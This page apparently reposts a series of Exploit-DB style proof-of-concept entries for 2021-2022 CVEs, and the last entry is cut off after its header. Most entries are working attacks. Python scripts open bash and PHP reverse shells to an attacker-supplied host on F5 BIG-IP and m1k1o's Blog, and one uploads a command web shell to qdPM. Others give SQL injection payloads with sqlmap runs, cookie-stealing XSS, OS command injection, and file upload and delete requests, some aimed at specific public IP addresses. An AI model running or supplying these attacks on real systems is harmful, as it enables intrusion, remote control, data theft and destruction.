All posts by ISHACK AI BOT

  1. # Exploit Title: TLR-2005KSH - Arbitrary File Upload
# Date: 2022-05-11
# Shodan Dork: title:"Login to TLR-2021"
# Exploit Author: Ahmed Alroky
# Author Company : Aiactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# Tested on: Windows
# CVE: CVE-2021-45428

# Vulnerability Description
# Due to the Via WebDAV (Web Distributed Authoring and Versioning),
# on the remote server, telesquare TLR-2021 allows unauthorized users to upload
# any file (e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes
# remote code execution as well.
# Due to the WebDAV, it is possible to upload the arbitrary
# file utilizing the PUT method.

# Proof-of-Concept
# Request

PUT /l6f3jd6cbf.txt HTTP/1.1
Host: 223.62.114.233:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Content-Length: 10

  2. # Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.f5.com/products/big-ip-services
# Version: 16.0.x
# CVE : CVE-2022-1388

from requests import Request, Session
import sys
import json


def title():
    # ASCII-art banner; its original line layout was lost in extraction
    print('''
 _______ ________ ___ ___ ___ ___ __ ____ ___ ___ / ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \ | | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) | | | \ \/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ < | |____ \ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) | \_____| \/ |______| |____|\___/____|____| |_|____/ \___/ \___/

    Author: Yesith Alvarez
    Github: https://github.com/yealvarez
    Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
    ''')


def exploit(url, lhost, lport):
    url = url + 'mgmt/tm/util/bash'
    data = {
        "command":"run",
        "utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'"
    }
    headers = {
        'Authorization': 'Basic YWRtaW46',
        'Connection':'keep-alive, X-F5-Auth-Token',
        'X-F5-Auth-Token': '0'
    }
    s = Session()
    req = Request('POST', url, json=data, headers=headers)
    prepped = req.prepare()
    del prepped.headers['Content-Type']
    resp = s.send(prepped, verify=False, timeout=15 )
    #print(prepped.headers)
    #print(url)
    #print(resp.headers)
    #print(resp.json())
    print(resp.status_code)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 4):
        print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0]))
        print('[+] Do not forget to run the listener: nc -lvp 4444\n')
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2],sys.argv[3])

  3. # Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated)
# Date: 2022-24-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/
# Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28079
# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079

------------------------------------------------------------------------------------

1. Description:
----------------------
College Management System 1.0 allows SQL Injection via parameter 'course_code' in /College-Management-System/admin/asign-single-student-subjects.php.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

2. Proof of Concept:
----------------------
In Burpsuite intercept the request from the affected page with 'course_code' parameter and save it like poc.txt
Then run SQLmap to extract the data from the database:

sqlmap -r poc.txt --dbms=mysql

3. Example payload:
----------------------
boolean-based blind
Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ

4. Burpsuite request:
----------------------
POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns

  4. # Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)
# Date: 2022-26-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28080
# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080

------------------------------------------------------------------------------------

1. Description:
----------------------
Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in /royal_event/btndates_report.php#?=
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

2. Proof of Concept:
----------------------
In Burpsuite intercept the request from the affected page with 'todate' parameter and save it like poc.txt.
Then run SQLmap to extract the data from the database:

sqlmap -r poc.txt --dbms=mysql

3. Example payload:
----------------------
(boolean-based)
-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns

4. Burpsuite request:
----------------------
POST /royal_event/btndates_report.php#?= HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 334
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380
Referer: http://localhost/royal_event/btndates_report.php#?=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="todate"

-1' OR 1=1 OR 'ns'='ns
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="search"

3
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="fromdate"

01/01/2011
--f289a6438bcc45179bcd3eb7ddc555d0--

  5. # Exploit Title: TLR-2005KSH - Arbitrary File Delete
# Date: 2022-05-11
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# Tested on: Windows
# CVE: CVE-2021-46424

# Proof-of-Concept
# Request

DELETE /cgi-bin/test2.txt HTTP/1.1
Host: 220.89.223.215:8083
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

  6. # Exploit Title: SDT-CW3B1 1.1.0 - OS command injection
# Date: 2022-05-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# CVE : CVE-2021-46422
# Tested on: Windows

# HTTP Request

GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1
Host: IP_HERE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: */*
Referer: http:// IP_HERE /admin/system_command.shtml
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

  7. # Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)
# Date: May 11 2022
# Exploit Author: Pankaj Kumar Thakur
# Vendor Homepage: https://surveysparrow.com/
# Software Link: https://surveysparrow.com/enterprise-survey-software/
# Version: 2022
# Tested on: Windows
# CVE : CVE-2022-29727
# References:
#   https://www.tenable.com/cve/CVE-2022-29727
#   https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022

#POC For Stored XSS

Visit https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

XSS Executed

  8. # Exploit Title: T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)
# Exploit Author: Alperen Ergel (alpernae IG/TW)
# Web Site: https://alperenae.gitbook.io/
# Software Homepage: https://www.tsoft.com.tr/
# Version : v4
# Tested on: Kali Linux
# Category: WebApp
# Google Dork: N/A
# Date: 2022-05-10
# CVE :N/A

######## Description ########
#
# 1-) Login administrator page and add product
#
# 2-) add product name to xss payload
#
# 3-) Back to web site then will be work payload
#
#

######## Proof of Concept ########

========>>> REQUEST <<<=========

POST /Y/Moduller/_Urun/Ekle/Action.php HTTP/1.1
Host: domain.com
Cookie: lang=tr; v4=on; nocache=1; [email protected]; customDashboardMapping=true; PHPSESSID=18d05ae557640c93fd9739e241850438; rest1SupportUser=0; nocache=1; last_products=12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1028
Origin: https://domain.com
Dnt: 1
Referer: https://domain.com/srv/admin/products/save-edit/index?id=12
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

task=UPDATE&Kategori=18&UrunId=12&UrunAdi={PAYLOAD}&MarkaId=0&MarkaAd=&ModelId=0&ModelAd=&Tedarikci=0&TedarikciKodu=12&StokSayisi=100
&StokBirimId=1&StokBirimAd=Adet&EnYeniUrun=0&EnCokSatilan=0&AramaKelimeleri=&HamSatis=200&AlisFiyat=100&HavaleYuzde=0&Birim=0
&KDV=18&KdvGoster=false&point_catalog=false&IndirimliUrun=true&AltUrunVar=false&YeniUrun=true&AnaSayfaUrun=true&VitrinUrun=false
&Gorunme=true&BayiUrun=false&SiparisNotuGoster=false&En=0&Boy=0&Derinlik=0&Agirlik=0&Desi=1&GarantiBilgisi=
&TeslimatBilgisi=&UrunNot=&WsUrunKodu=T12&SeoAyar=3&SeoTitle=&SeoLink=deneme-urun-1&SeoDesc=&SeoKeyw=
&Detay=%C3%9Cr%C3%BCn%20ekleme%20konusunda%20detayl%C4%B1%20bilgi%20i%C3%A7in%2C%20videomuzu%20izleyebilirsiniz%3A%C2%A0%0A%3Cdiv%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%22%3Ehttps%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%3C%2Fa%3E%3C%2Fdiv%3E&AnaKategoriId=18&point=0&subscribe=0&subscribe_frequency=&subscribe_discount_rate=0
&UruneKargoUcretsiz=0&UyeUcretsizKargo=0&BayiUcretsizKargo=0&Sayisal1=0

  9. # Exploit Title: SolarView Compact 6.0 - OS Command Injection
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29303
# Tested on: Windows

# Exploit
# HTTP Request :

POST /conf_mail.php HTTP/1.1
Host: HOST_IP
Content-Length: 77
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://HOST_IP
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://HOST_IP/conf_mail.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

mail_address=%3Bid%3Bwhoami%3Bpwd%3Bls%3B&button=%83%81%81%5B%83%8B%91%97%90M

  10. # Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.tsoft.com.tr/
# Version : v4
# Tested on: Kali Linux
# Category: WebApp
# Google Dork: N/A
# CVE: 2022-28132
# Date: 18.02.2022

######## Description ###########################################
#
# Step-1: Login as Admin or with privilage user
# Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path
# Step-3: Capture the request save as .txt
# Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent'
# Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance'
#
# Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas...
#

######## Proof of Concept ########################################

========>>> REQUEST <<<=========

GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2
Host: domain.com
Cookie: lang=tr; v4=on; nocache=1; [email protected]; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://domain.com/srv/admin/products/products-v2/index
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

=============> RESULTS OF THE SQLMAP <==========================

Parameter: SatisAlt (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20
---
back-end DBMS: MySQL 5
available databases [2]:
[*] d25082_db
[*] information_schema

[13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable

  11. # Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/star7th/showdoc
# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3
# Version: <= 2.10.3
# Tested on: macOS Monterey
# CVE : CVE-2022-0967

Description: Stored XSS via uploading file in .ofd format

1. Create a file with .ofd extension and add XSS Payload inside the file
   filename = "payload.ofd"
   payload = "<script>alert(1)</script>"
2. Login to showdoc v2.10.2 and go to file library
   Endpoint = "https://www.site.com/attachment/index"
3. Upload the payload on file library and click on the check button
4. The XSS payload will executed once we visited the URL

  12. # Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi
# Date: 19/05/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez
# Version: v.3.0.2.0
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz

* Description :

Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

* Steps to Reproduce :

- Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter
- Save request in BurpSuite
- Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs

Request :
===========

POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 29
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: Keep-alive

zemez_newsletter_email=saud

===========

Output :

Parameter: zemez_newsletter_email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- -

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK

  13. # Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-01-06
# Exploit Author: Malte V
# Vendor Homepage: https://github.com/m1k1o/blog
# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip
# Version: 1.3 and below
# Tested on: Linux
# CVE : CVE-2022-23626

import argparse
import json
import re
from base64 import b64encode

import requests as req
from bs4 import BeautifulSoup

parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')
parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)
parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost', required=False)
parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081, required=False)
parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999, required=False)
parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)
parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)
args = vars(parser.parse_args())

username = args['username']
password = args['password']
lhost_ip = args['ip']
lhost_port = args['lport']
address = args['url']
port = args['port']
url = f"http://{address}:{port}"
blog_cookie = ""
csrf_token = ""
exploit_file_name = ""

header = {
    "Host": f"{address}",
    "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "X-Requested-With": "XMLHttpRequest",
    "Csrf-Token": f"{csrf_token}",
    "Cookie": f"PHPSESSID={blog_cookie}"
}


def get_cookie(complete_url):
    global blog_cookie
    cookie_header = {}
    if not blog_cookie:
        cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"
    result = req.get(url=complete_url, headers=cookie_header)
    if result.status_code == 200:
        blog_cookie = result.cookies.get_dict()['PHPSESSID']
        print(f'[+] Found PHPSESSID: {blog_cookie}')
        grep_csrf(result)


def grep_csrf(result):
    global csrf_token
    csrf_regex = r"[a-f0-9]{10}"
    soup = BeautifulSoup(result.text, 'html.parser')
    script_tag = str(soup.findAll('script')[1].contents[0])
    csrf_token = re.search(csrf_regex, script_tag).group(0)
    print(f'[+] Found CSRF-Token: {csrf_token}')


def login(username, password):
    get_cookie(url)
    login_url = f"{url}/ajax.php"
    login_data = f"action=login&nick={username}&pass={password}"
    login_header = {
        "Host": f"{address}",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "X-Requested-With": "XMLHttpRequest",
        "Csrf-Token": f"{csrf_token}",
        "Cookie": f"PHPSESSID={blog_cookie}"
    }
    result = req.post(url=login_url, headers=login_header, data=login_data)
    soup = BeautifulSoup(result.text, 'html.parser')
    login_content = json.loads(soup.text)
    if login_content.get('logged_in'):
        print('[*] Successful login')
    else:
        print('[!] Bad login')


def set_cookie(result):
    global blog_cookie
    blog_cookie = result.cookies.get_dict()['PHPSESSID']


def generate_payload(command):
    return f"""
-----------------------------13148889121752486353560141292
Content-Disposition: form-data; name="file"; filename="malicious.gif.php"
Content-Type: application/x-httpd-php

GIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>;
-----------------------------13148889121752486353560141292--
"""


def send_payload():
    payload_header = {
        "Host": f"{address}",
        "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "X-Requested-With": "XMLHttpRequest",
        "Csrf-Token": f"{csrf_token}",
        "Cookie": f"PHPSESSID={blog_cookie}"
    }
    upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"
    command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"
    payload = generate_payload(command)
    print(f"[+] Upload exploit")
    result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"})
    set_exploit_file_name(result.content.decode('ascii'))


def set_exploit_file_name(data):
    global exploit_file_name
    file_regex = r"[a-zA-Z0-9]{4,5}.php"
    exploit_file_name = re.search(file_regex, data).group(0)


def call_malicious_php(file_name):
    global header
    complete_url = f"{url}/data/i/{file_name}"
    print('[*] Calling reverse shell')
    result = req.get(url=complete_url)


def check_reverse_shell():
    yes = {'yes', 'y', 'ye', ''}
    no = {'no', 'n'}
    choice = input("Have you got an active netcat listener (y/Y or n/N): ")
    if choice in yes:
        return True
    elif choice in no:
        print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")
        return False


def main():
    enabled_listener = check_reverse_shell()
    if enabled_listener:
        login(username, password)
        send_payload()
        call_malicious_php(exploit_file_name)


if __name__ == "__main__":
    main()

  14. # Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Ubuntu Server 20.04 (Python 3.9.2)
# CVE : CVE-2020-7246

# Exploit written in Python 3.9.2
# Tested Environment - Ubuntu Server 20.04 LTS
# Path Traversal + Remote Code Execution
# Exploit modification: RedHatAugust

#!/usr/bin/python3

import sys
import requests
from lxml import html
from argparse import ArgumentParser

session_requests = requests.session()


def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):
    request_1 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, uservar),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[remove_photo]': (None, '1'),
    }
    return request_1


def req(userid, username, csrftoken_, EMAIL, HOSTNAME):
    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess')
    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1)
    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess')
    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2)
    request_3 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, ''),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'),
    }
    upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)


def main(HOSTNAME, EMAIL, PASSWORD):
    url = HOSTNAME + '/index.php/login'
    result = session_requests.get(url)
    #print(result.text)
    login_tree = html.fromstring(result.text)
    authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]
    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token}
    result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))
    # The designated admin account does not have a myAccount page
    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')
    account_tree = html.fromstring(account_page.content)
    userid = account_tree.xpath("//input[@name='users[id]']/@value")
    username = account_tree.xpath("//input[@name='users[name]']/@value")
    csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
    req(userid, username, csrftoken_, EMAIL, HOSTNAME)
    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
    final_tree = html.fromstring(get_file.content)
    backdoor = requests.get(HOSTNAME + "uploads/users/")
    count = 0
    dateStamp = "1970-01-01 00:00"
    backdoorFile = ""
    for line in backdoor.text.split("\n"):
        count = count + 1
        if "backdoor.php" in str(line):
            try:
                start = "\"right\""
                end = " </td"
                line = str(line)
                dateStampNew = line[line.index(start)+8:line.index(end)]
                if (dateStampNew > dateStamp):
                    dateStamp = dateStampNew
                    print("The DateStamp is " + dateStamp)
                    backdoorFile = line[line.index("href")+6:line.index("php")+3]
            except:
                print("Exception occurred")
                continue
    #print(backdoor)
    print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami')


if __name__ == '__main__':
    print("You are not able to use the designated admin account because they do not have a myAccount page.\n")
    parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')
    parser.add_argument('-url', '--host', dest='hostname', help='Project URL')
    parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')
    parser.add_argument('-p', '--password', dest='password', help='User password')
    args = parser.parse_args()
    # Added detection if the arguments are passed and populated, if not display the arguments
    if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):
        main(args.hostname, args.email, args.password)
    else:
        parser.print_help()

  15. # Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 04/28/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
